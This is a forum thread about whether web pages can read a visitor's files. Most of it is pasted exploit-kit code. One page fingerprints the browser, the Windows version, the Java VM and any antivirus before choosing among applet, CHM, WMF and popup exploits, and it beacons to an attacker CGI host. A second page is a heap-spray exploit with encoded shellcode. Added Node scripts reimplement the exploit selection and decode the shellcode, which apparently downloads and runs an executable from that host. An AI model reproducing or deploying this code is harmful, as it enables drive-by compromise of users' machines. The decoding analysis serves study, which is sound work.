Is it possible to run a command on the client computer?

navti

navti said:

That page describes JavaScript methods available in jrunscript,
which is not the engine you'll find in a web browser.

--

OK. So how do I do a dir of a directory and display it in the
browser?
 
Ivan Marsh

OK. So how do I do a dir of a directory and display it in the browser?

You do not have access to the local machine without having an extension
allowing that access installed on the local machine.
 
navti

Can you think of the absolute mayhem that would arise if websites could
create/alter the filesystem of the computer that the web browser/client is
on?

There is good reason that that sort of thing is not permitted with plain
ol' JavaScript.

I visited a website of an enemy and he not only did a listing of my
local files, he also copied them to his server. I'm pretty certain he
was using JavaScript.
 
Ivan Marsh

I visited a website of an enemy and he not only did a listing of my
local files, he also copied them to his server. I'm pretty certain he
was using JavaScript.

No, he was not... and you must have your browser set to trust anything
that it downloads.
 
Tim Slattery

navti said:
I visited a website of an enemy and he not only did a listing of my
local files, he also copied them to his server. I'm pretty certain he
was using JavaScript.

He could display a list of your files just by referring your browser
to a URL of file:///c:/ or something like that. That would cause your
browser (IE, at any rate) to show you what's on your disk. Your
"attacker" would never see this, it's simply your browser reading your
disk and showing you the result. In a normal security environment,
there's nothing in Javascript to collect this data and send it
anywhere.
 
navti

No, he was not...

It all happened automatically without any intervention. I was using
Win2k and IE6 at the time. I have since switched to Mac OS X.

Have you seen the code of WebAttacker?

I haven't, but is it not mostly JavaScript?
 
Jeff Johns

It all happened automatically without any intervention. I was using
Win2k and IE6 at the time. I have since switched to Mac OS X.

Have you seen the code of WebAttacker?

I haven't, but is it not mostly JavaScript?

There is a way to show all the folders of your c: drive in an iframe.
Is this what happened? Did it show your basic filesystem and merely
say it took everything? I agree with the other users, unless you
installed or accepted it cannot happen.
 
Ivan Marsh

It all happened automatically without any intervention. I was using
Win2k and IE6 at the time. I have since switched to Mac OS X.

Have you seen the code of WebAttacker?

I haven't, but is it not mostly JavaScript?

I'm guessing it's mostly HTML... but you can't read the local file system
with HTML any more than you can with JavaScript.

You cannot get to the local machine without installing a conduit to the
local machine.
 
-Lost

navti said:
It all happened automatically without any intervention. I was using
Win2k and IE6 at the time. I have since switched to Mac OS X.

Have you seen the code of WebAttacker?

I haven't, but is it not mostly JavaScript?

You haven't seen the code for Webattacker, yet are positive it is
JavaScript-based? Hrmm...

Anyway, no, I assure you, the problem arose from you using Internet
Explorer 6, *with* lax security settings and the code used to pervert
your system was indeed, Microsoft-specific (VBScript).
 
navti

You haven't seen the code for Webattacker, yet are positive it is
JavaScript-based? Hrmm...

Anyway, no, I assure you, the problem arose from you using Internet
Explorer 6, *with* lax security settings and the code used to pervert
your system was indeed, Microsoft-specific (VBScript).

I just found some of the WebAttacker code

<iframe src="http://fl4w.info/shit/index.php" width=1 height=1></iframe>
<!--hppage status="protected"-->
<HTML xmlns:IE>
<TITLE>Demo page</TITLE>
<HEAD><SCRIPT LANGUAGE="JavaScript"><!--
// "HTML Protector" stub: the %XX-escaped string decodes to a script that sets hp_ok=true and defines hp_d00(s), a guarded document.write()
document.write(unescape("%3C%53%43%52%49%50%54%20%4C%41%4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F%53%43%52%49%50%54%3E"));//--></SCRIPT>
<STYLE type='text/css'>
IE\:clientCaps {behavior:url(#default#clientcaps)}
</STYLE>
</HEAD>
<BODY onLoad="setTimeout('Run_BOF()',2000);"><NOSCRIPT>To display this page you need a browser with JavaScript support.</NOSCRIPT>
<CENTER><H1>This site is under construction...</H1></CENTER>

<IFRAME name="StatPage" width=5 height=5 style="display:none"></IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></IFRAME>
<DIV id="ObjectContainer"></DIV>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">

var ExploitNumber=0;

// Version of an installed component via IE's clientCaps behaviour; [0,0,0,0] if it is absent
function GetVersion(CLSID)
{
  if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
    {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
  else
    {return Array(0,0,0,0);}
}

// Windows version tag from navigator.appVersion
function Get_Win_Version(IE_vers)
{
  if (IE_vers.indexOf('Windows 95') != -1) return "95"
  else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
  else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
  else if (IE_vers.indexOf('Windows 98') != -1) return "98"
  else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
  else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
  else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}

// Exploit 4, fired from the body onLoad timer: four hidden iframes of pluginst.htm, then ie0601d.htm
function Run_BOF()
{
  if (ExploitNumber==4)
  {
    self.focus();
    for (i=1 ; i <=4 ; i++)
    {
      document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');
    }
    document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>');
  }
}

var CGI_Script="http://jag.mews.ru/cgi-bin/ie0601.cgi";

if (navigator.appName=="Microsoft Internet Explorer")
{
  Click_Request=CGI_Script+"?click";
  var InetPath=document.location.href;
  j=InetPath.lastIndexOf('/');
  InetPath=InetPath.slice(0,j);

  var IEversion=navigator.appVersion;
  var IEplatform=navigator.platform;
  if (IEplatform.search("Win32") != -1)
  {
    var WinOS=Get_Win_Version(IEversion);
    // appMinorVersion carries the service pack level, e.g. ";SP2;"
    FullVersion=clientInformation.appMinorVersion;
    PatchList=FullVersion.split(";");
    for (var i=0; i < PatchList.length; i++)
    {
      ServicePack=PatchList[i]; // "[i]" restored; the forum swallowed it as a BBCode italic tag
      j=ServicePack.indexOf('SP');
      if (j != -1)
      {
        ServicePack=ServicePack.substr(j);
        Click_Request=Click_Request+'&'+ServicePack;
      }
    }
    // beacon the visit and the service pack level to the stats CGI
    StatPage.location=Click_Request;
    var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}"); // Microsoft VM
    var IE_vers = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}"); // Internet Explorer
    fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
    // detect antivirus products by instantiating their ActiveX controls
    try
    {
      var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization
      fNortonAV=1;
    }
    catch(e){}
    try
    {
      var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization
      fMcAfee=1;
    }
    catch(e){}

    // pick the exploit from Windows version, MSVM build, XP service pack and AV presence
    switch (WinOS)
    {
      case "2K":
        if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
          { ExploitNumber=1; }
        else // if JVM = 5.0.3810.0 or higher
        {
          if ((fNortonAV==0)&&(fMcAfee==0))
            { ExploitNumber=3; }
          else
            { ExploitNumber=2; }
        }
        break;
      case "2K3":
        if ((fNortonAV==0)&&(fMcAfee==0))
          { ExploitNumber=3; }
        else
          { ExploitNumber=4; }
        break;
      case "XP":
        if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
          { ExploitNumber=1; }
        else // if JVM = 5.0.3810.0 or higher
        {
          for (var i=0; i < PatchList.length; i++)
          {
            if (PatchList[i]=="SP2") // "[i]" restored, as above
              { XP_SP2_patched=1; }
          }
          if (XP_SP2_patched==0)
          {
            if ((fNortonAV==0)&&(fMcAfee==0))
              { ExploitNumber=3; }
            else
              { ExploitNumber=4; }
          }
          else
          {
            if ((fNortonAV==0)&&(fMcAfee==0))
              { ExploitNumber=5; }
            else
              { ExploitNumber=4; }
          }
        }
        break;
      default:
        if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
          { ExploitNumber=1; }
        else
          { ExploitNumber=2; } // if JVM = 5.0.3810.0 or higher
        break;
    }
    // launch the exploit whose number depends on the Windows and IE versions
    switch (ExploitNumber)
    {
      case 1: // Java applet for the Microsoft VM, told where to fetch the trojan
        Trojan_Path=CGI_Script+"?exploit=MS03-11";
        ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="TakePrivileges.class" width=1 height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>';
        break;
      case 2: // CHM pulled in over the ms-its:mhtml: protocol (the scheme string is assembled from escapes)
        CHM_base='//ie0601b.chm'+'::'+'/main.htm';
        Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
        Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
        oMSITS=document.createElement("<OBJECT data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");
        document.body.appendChild(oMSITS);
        document.title="Loaded !";
        break;
      case 3: // tiny popup positioned off-screen
        window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1,menubar=0,titlebar=0,toolbar=0,status=0");
        self.focus();
        break;
      case 4: // handled by Run_BOF() on a 2 s timer
        setTimeout('Run_BOF()',2000);
        break;
      case 5: // WMF file into the hidden iframe
        PageContainer.location="ie0601e.wmf";
        break;
      default:
        break;
    }

  }
}
else if (navigator.appName=="Netscape")
{
  StatPage.location=CGI_Script+"?click";
  if (navigator.userAgent.indexOf('Firefox') != -1)
  {
    PageContainer.location="mfsa0601.htm";
  }
}
else
{
  StatPage.location=CGI_Script+"?click";
}
</script>
</BODY>
</HTML>
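The decision table that index.php applies, rewritten as an added example (it is not the kit's own code) in plain JavaScript that runs under Node: the browser profile is passed in as an object instead of being read from navigator, clientInformation and the ActiveX probes, and every profile value used below is constructed for illustration, not captured from a real victim.

```javascript
// Added example, not the kit's own code: the victim-profiling and
// exploit-selection logic of the posted index.php as a pure function.

const CGI_SCRIPT = "http://jag.mews.ru/cgi-bin/ie0601.cgi"; // from the posted page

// What each ExploitNumber makes the page load (names from the second switch).
const EXPLOIT_LOADS = {
  1: "ie0601a.jar applet, ModulePath=" + CGI_SCRIPT + "?exploit=MS03-11",
  2: "ie0601b.chm through an ms-its:mhtml: scriptlet OBJECT",
  3: "ie0601c.htm in an off-screen popup",
  4: "pluginst.htm (x4) and ie0601d.htm in hidden iframes, via Run_BOF()",
  5: "ie0601e.wmf in the hidden PageContainer iframe",
};

// Same substring tests, in the same order, as Get_Win_Version().
function windowsTag(appVersion) {
  const table = [
    ["Windows 95", "95"], ["Windows NT 4", "NT"], ["Win 9x 4.9", "ME"],
    ["Windows 98", "98"], ["Windows NT 5.0", "2K"], ["Windows NT 5.1", "XP"],
    ["Windows NT 5.2", "2K3"],
  ];
  for (const [needle, tag] of table) {
    if (appVersion.indexOf(needle) !== -1) return tag;
  }
  return undefined; // falls into the kit's "default" case
}

// Service-pack tokens out of clientInformation.appMinorVersion, which the
// kit expects to look like ";SP2;" (constructed value, see the demo below).
function servicePacks(appMinorVersion) {
  return appMinorVersion.split(";")
    .filter((p) => p.indexOf("SP") !== -1)
    .map((p) => p.substr(p.indexOf("SP")));
}

// The first switch of index.php. msvmBuild stands for JVM_vers[2] (0 when
// the Microsoft VM is absent); hasAV for either ActiveX probe succeeding.
function exploitNumber(os, sps, msvmBuild, hasAV) {
  const oldMsvm = msvmBuild !== 0 && msvmBuild < 3810;
  const noAV = !hasAV;
  switch (os) {
    case "2K":  return oldMsvm ? 1 : (noAV ? 3 : 2);
    case "2K3": return noAV ? 3 : 4;
    case "XP":
      if (oldMsvm) return 1;
      if (!sps.includes("SP2")) return noAV ? 3 : 4;
      return noAV ? 5 : 4;
    default:    return oldMsvm ? 1 : 2;
  }
}

// profile = { appName, platform, userAgent, appVersion, appMinorVersion, msvmBuild, hasAV }
// Returns the stats beacon the page would request and what it would load.
function selectPayload(profile) {
  const none = { beacon: null, exploit: null, loads: null };
  if (profile.appName !== "Microsoft Internet Explorer") {
    const firefox = profile.appName === "Netscape" && /Firefox/.test(profile.userAgent || "");
    return { ...none, beacon: CGI_SCRIPT + "?click", loads: firefox ? "mfsa0601.htm" : null };
  }
  if ((profile.platform || "").indexOf("Win32") === -1) return none; // non-Win32 IE: nothing at all
  const sps = servicePacks(profile.appMinorVersion || "");
  const n = exploitNumber(windowsTag(profile.appVersion), sps, profile.msvmBuild || 0, !!profile.hasAV);
  return {
    beacon: CGI_SCRIPT + "?click" + sps.map((sp) => "&" + sp).join(""),
    exploit: n,
    loads: EXPLOIT_LOADS[n],
  };
}

// Constructed profile, not real telemetry: XP SP2, MSVM build 3810, no AV.
const xpSp2NoAV = {
  appName: "Microsoft Internet Explorer", platform: "Win32",
  appVersion: "4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
  appMinorVersion: ";SP2;", msvmBuild: 3810, hasAV: false,
};
console.log(selectPayload(xpSp2NoAV)); // exploit 5, the WMF file
```

Feeding it a handful of profiles shows the shape of the kit: a Win2K box with a pre-3810 Microsoft VM gets the applet, a fully patched XP SP2 machine with no antivirus gets the WMF, anything the kit cannot place gets the CHM, and every IE visitor on Win32 reports its service-pack level to the stats CGI before any of that happens.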
 
navti

This is mfsa0601.htm

<!--hppage status="protected"-->
<HTML><HEAD><SCRIPT LANGUAGE="JavaScript"><!--
// same "HTML Protector" stub as in index.php
document.write(unescape("%3C%53%43%52%49%50%54%20%4C%41%4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F%53%43%52%49%50%54%3E"));//--></SCRIPT><SCRIPT language="javascript">
// %uXXXX-encoded payload: a short sub/xor decoder loop followed by the encoded body
var Shellcode=unescape("%u9090%u9090%u3390%u33c0%uebc9%u5e12%ub966%u0104%ufe8b%u2e80%u8006%u0136%ue246%uebf7%ue805%uffe9%uffff%u5bf0%u7a90%u9043%u357b%u087f%u5dfa%u7d90%u0827%u38fa%u4ece%ub246%ue038%u143d%u1bc5%u3f2f%u7bf9%uc60f%u12d0%ue108%uf047%u40f4%u7ae4%u65ec%u6590%u082b%u6de2%u1390%u9050%u2365%ue208%u0b90%u0890%uc8ca%u595a%u5253%u5554%u4b35%u5353%u4807%u6341%u357c%u7f6a%u076a%uc738%u086b%u3747%u137f%u4790%u9013%u2377%u90b2%u0f47%u0ef0%u4790%u923b%u8347%u4790%u9a43%u95c4%u1555%ueff3%u048b%u0404%uf388%u880b%u2b33%u0443%u9ad7%uc457%u213d%u7734%u74ef%u0404%u9004%u2b5b%u9203%uc159%ue038%u5858%uf059%u582b%ud704%uc462%u059f%u1591%u58ef%u0404%u8804%u0bf3%u3388%u692b%ud704%u85c4%ue9df%uef78%u0447%u0404%u0459%uefd7%u04dc%u0404%u7b6f%u777b%u3441%u7134%u6c66%u7235%u7c6a%u3578%u7a79%u6834%u6e6c%u6932%u756e%u6e34%u376a%u373d%u3536%u6c68%u446e%u7f6a%u7377%u6e74%u427b%u4d52%u4658%u3739%u3a37%u3a32%u0737");
function Run_BOF() {
  // spray the heap up to 0x12000000 in 4 MB blocks, each a slide followed by the shellcode
  var heapSprayToAddress=0x12000000;
  var heapBlockSize=0x400000;
  var ShellcodeSize=Shellcode.length * 2;
  var spraySlideSize=heapBlockSize-(ShellcodeSize+0x38);
  var spraySlide1 = unescape("%u002C%u11C0"); // dword 0x11C0002C, an address inside the sprayed region
  spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
  var spraySlide2 = unescape("%u002C%u1200"); // dword 0x1200002C
  spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
  var spraySlide3 = unescape("%u9090%u9090"); // NOP slide
  spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
  heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
  memory = new Array();
  for (i=0;i<heapBlocks;i++)
  { memory[i]=(i%3==0) ? spraySlide1 + Shellcode: (i%3==1) ? spraySlide2 + Shellcode: spraySlide3 + Shellcode; } // "[i]" restored; the forum swallowed it as a BBCode italic tag
  // trigger: InstallVersion.compareTo() with a crafted Number (MFSA 2005-50)
  location.href="javascript:void (new InstallVersion());";
  var eaxAddress = 0x1180002C;
  (new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}
// double the slide until it reaches the requested size, then trim it
function getSpraySlide(spraySlide, spraySlideSize) {
  while (spraySlide.length*2<spraySlideSize)
  { spraySlide+=spraySlide; }
  spraySlide=spraySlide.substring(0,spraySlideSize/2);
  return spraySlide;
}
</SCRIPT></HEAD>
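Decoding both obfuscation layers in these two files, as an added example that is not part of the posted kit: the %XX stub in the HEAD script, and the %uXXXX shellcode from mfsa0601.htm, whose leading decoder loop (sub 6, then xor 1, over 0x104 bytes) can be read straight off its first bytes. The escaped strings are copied from the posts above; the code only transforms them and executes nothing.

```javascript
// Added example, not the kit's own code: static decoders for the "hppage"
// stub and for the sub/xor-encoded shellcode, plus the heap-spray geometry
// that Run_BOF() computes. Escaped strings copied from the posted files.

const HPPAGE_STUB =
  "%3C%53%43%52%49%50%54%20%4C%41%4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D" +
  "%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B" +
  "%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F%53%43%52%49%50%54%3E";

const SHELLCODE = [
  "%u9090%u9090%u3390%u33c0%uebc9%u5e12%ub966%u0104%ufe8b%u2e80%u8006%u0136%ue246%uebf7%ue805%uffe9%uffff",
  "%u5bf0%u7a90%u9043%u357b%u087f%u5dfa%u7d90%u0827%u38fa%u4ece%ub246%ue038%u143d%u1bc5%u3f2f%u7bf9%uc60f",
  "%u12d0%ue108%uf047%u40f4%u7ae4%u65ec%u6590%u082b%u6de2%u1390%u9050%u2365%ue208%u0b90%u0890%uc8ca%u595a",
  "%u5253%u5554%u4b35%u5353%u4807%u6341%u357c%u7f6a%u076a%uc738%u086b%u3747%u137f%u4790%u9013%u2377%u90b2%u0f47%u0ef0%u4790%u923b",
  "%u8347%u4790%u9a43%u95c4%u1555%ueff3%u048b%u0404%uf388%u880b%u2b33%u0443%u9ad7%uc457%u213d%u7734%u74ef%u0404%u9004%u2b5b",
  "%u9203%uc159%ue038%u5858%uf059%u582b%ud704%uc462%u059f%u1591%u58ef%u0404%u8804%u0bf3%u3388%u692b%ud704%u85c4%ue9df",
  "%uef78%u0447%u0404%u0459%uefd7%u04dc%u0404%u7b6f%u777b%u3441%u7134%u6c66%u7235%u7c6a%u3578%u7a79%u6834%u6e6c%u6932%u756e",
  "%u6e34%u376a%u373d%u3536%u6c68%u446e%u7f6a%u7377%u6e74%u427b%u4d52%u4658%u3739%u3a37%u3a32%u0737",
].join("");

// unescape() semantics, but yielding bytes: a %uXXXX code unit occupies two
// bytes in memory, low byte first, which is how the spray lays it out.
function escapedToBytes(s) {
  const out = [];
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|([\s\S])/g;
  let m;
  while ((m = re.exec(s)) !== null) {
    if (m[1] !== undefined) { const cu = parseInt(m[1], 16); out.push(cu & 0xff, cu >> 8); }
    else if (m[2] !== undefined) out.push(parseInt(m[2], 16));
    else out.push(m[3].charCodeAt(0) & 0xff);
  }
  return out;
}

// Layer 1: the stub is plain %XX-escaped ASCII.
function decodeStub(escaped) {
  return String.fromCharCode.apply(null, escapedToBytes(escaped));
}

// Layer 2: recognise the decoder loop at the head of the shellcode:
//   66 b9 lo hi    mov cx, imm16        payload length
//   80 2e k        sub byte [esi], k
//   80 36 k        xor byte [esi], k
//   e8 xx xx xx xx call (back to "pop esi"); the payload follows the call
function parseDecoderStub(bytes) {
  const head = bytes.slice(0, 64);
  const find = (pat, from) => {
    for (let i = from; i + pat.length <= head.length; i++) {
      if (pat.every((v, k) => head[i + k] === v)) return i;
    }
    return -1;
  };
  const iLen = find([0x66, 0xb9], 0), iSub = find([0x80, 0x2e], 0), iXor = find([0x80, 0x36], 0);
  const iCall = find([0xe8], Math.max(iLen, iSub, iXor));
  if (iLen < 0 || iCall < 0 || (iSub < 0 && iXor < 0)) throw new Error("decoder stub not recognised");
  const ops = []; // applied in the order the loop body executes them
  if (iSub >= 0) ops.push({ at: iSub, fn: (b) => (b - head[iSub + 2]) & 0xff });
  if (iXor >= 0) ops.push({ at: iXor, fn: (b) => b ^ head[iXor + 2] });
  ops.sort((a, b) => a.at - b.at);
  return { length: head[iLen + 2] | (head[iLen + 3] << 8), payloadOffset: iCall + 5, ops: ops.map((o) => o.fn) };
}

function decodeShellcode(bytes) {
  const stub = parseDecoderStub(bytes);
  return bytes.slice(stub.payloadOffset, stub.payloadOffset + stub.length)
    .map((b) => stub.ops.reduce((v, fn) => fn(v), b));
}

// Runs of printable ASCII: the quickest view of what a payload reaches for.
function printableStrings(bytes, minLen) {
  const out = [];
  let run = "";
  for (const b of bytes.concat([0])) {
    if (b >= 0x20 && b <= 0x7e) { run += String.fromCharCode(b); continue; }
    if (run.length >= minLen) out.push(run);
    run = "";
  }
  return out;
}

// Heap-spray geometry from Run_BOF(): how many 4 MB blocks are written and
// the little-endian dword the first slide repeats (a pointer into the spray, not a NOP).
function sprayGeometry(shellcodeByteLen) {
  const heapSprayToAddress = 0x12000000, heapBlockSize = 0x400000;
  const s = escapedToBytes("%u002C%u11C0");
  return {
    blocks: (heapSprayToAddress - 0x400000) / heapBlockSize,
    slideBytes: heapBlockSize - (shellcodeByteLen + 0x38),
    slideDword: (s[0] | (s[1] << 8) | (s[2] << 16) | (s[3] << 24)) >>> 0,
  };
}

const shellcodeBytes = escapedToBytes(SHELLCODE);
console.log(decodeStub(HPPAGE_STUB));
console.log(printableStrings(decodeShellcode(shellcodeBytes), 6));
console.log(sprayGeometry(shellcodeBytes.length));
```

Run it and the stub turns out to be nothing more than a document.write() guard (hp_ok and hp_d00), while the decoded payload's strings give URLMON.DLL, C:\w.exe and http://jag.mews.ru/cgi-bin/ie0601.cgi?exploit=MFSA2005-50, the same CGI host as CGI_Script in index.php. That download-and-execute step is the part of the drive-by that native code performs after the browser bug fires; the JavaScript on the page only profiles the visitor and stages the memory layout.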
 
-Lost

navti said:
i just found some of the webattacker code

<snip code>

OK, rather than say VBScript is the main culprit, I should have said
ActiveX.

All that JavaScript does is pry and develop identifying data to pass to
either a CGI script or to an ActiveX control (apparently to mess with
McAfee?).
 
navti

<snip code>

OK, rather than say VBScript is the main culprit, I should have said
ActiveX.

All that JavaScript does is pry and develop identifying data to pass to
either a CGI script or to an ActiveX control (apparently to mess with
McAfee?).

OK. So there is no way JavaScript can read a client's local files?
 
Andrew Thompson

....
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher

The (dreaded) MSVM.

If this script found a 3809 or previous build MSVM, it
might have taken advantage (using a Java applet) of any
number of security holes in those Microsoft VM's. Even
the 3810 build has existing security issues that will
never be fixed.

Microsoft themselves (who made the MSVM) recommend
upgrading to the Sun Java Plug-In. When security
issues are discovered in the Java Plug-In - they
are fixed quickly, and the end users are prompted
to update.

Note those comments have little to do with Javascript,
it is Java (a different language) that runs in the MSVM
and the Java Plug-In. The script is apparently attempting
to determine what the applet should attack - though the
author might have taken a simpler approach that required
no javascript.

I suspect, however, that one of the other posters got
the answer right when they suggested the host had done
something to make it *appear* to you that information
had been stolen (linking to a common directory on C:
drive would be enough to convince most people who
use IE).

Andrew T.
 
navti

It all happened automatically without any intervention. I was using
Win2k and IE6 at the time. I have since switched to Mac OS X.
...
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher

The (dreaded) MSVM.

If this script found a 3809 or previous build MSVM, it
might have taken advantage (using a Java applet) of any
number of security holes in those Microsoft VM's. Even
the 3810 build has existing security issues that will
never be fixed.

Microsoft themselves (who made the MSVM) recommend
upgrading to the Sun Java Plug-In. When security
issues are discovered in the Java Plug-In - they
are fixed quickly, and the end users are prompted
to update.

Note those comments have little to do with Javascript,
it is Java (a different language) that runs in the MSVM
and the Java Plug-In. The script is apparently attempting
to determine what the applet should attack - though the
author might have taken a simpler approach that required
no javascript.

I suspect, however, that one of the other posters got
the answer right when they suggested the host had done
something to make it *appear* to you that information
had been stolen (linking to a common directory on C:
drive would be enough to convince most people who
use IE).

Andrew T.

He stole my files. I know this for a fact.
Why would you think it was otherwise? Have you been living down a
mineshaft for the past 5 years? Never heard of XSS? Are you in some
sort of state of denial?
Only an ignoramus would try and deny it was possible for a web server
to compromise a client's machine.

My mistake is thinking JavaScript was enough. Obviously it was a
combination of JavaScript, Java, ActiveX, PHP, XML etc. etc.
 
Dag Sunde

navti said:
navti wrote:
It all happened automatically without any intervention. I was
using Win2k and IE6 at the time. I have since switched to Mac OS
X. ...
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher

The (dreaded) MSVM.
He stole my files. I know this for a fact.
Why would you think it was otherwise? Have you been living down a
mineshaft for the past 5 years? Never heard of XSS? Are you in some
sort of state of denial?
Only an ignoramus would try and deny it was possible for a web server
to compromise a client's machine.

My mistake is thinking JavaScript was enough. Obviously it was a
combination of JavaScript, Java, ActiveX, PHP, XML etc. etc.

JavaScript, PHP, XML etc. do not have *anything* to do with it!

The only way a webserver can compromise a client in the way you described
is either:
1.) A signed Java Applet where you explicitly have answered "Yes" when
asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have answered "Yes"
when asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of your
browser wide-open.

Neither PHP nor JavaScript is able to access your files.
 
navti

The only way a webserver can compromise a client in the way you described
is either:
1.) A signed Java Applet where you explicitly have answered "Yes" when
asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have answered "Yes"
when asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of your
browser wide-open.

Neither PHP nor JavaScript is able to access your files.

What about drive-by downloads where the client simply has to visit a
malicious web site to be compromised? You know that the client doesn't
have to do anything to give up his data to a malicious website, so why
are you denying it?
 
Lee

navti said:
what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?

You know this for a fact? Can you name such a site?
Or did this happen to a friend of a friend?

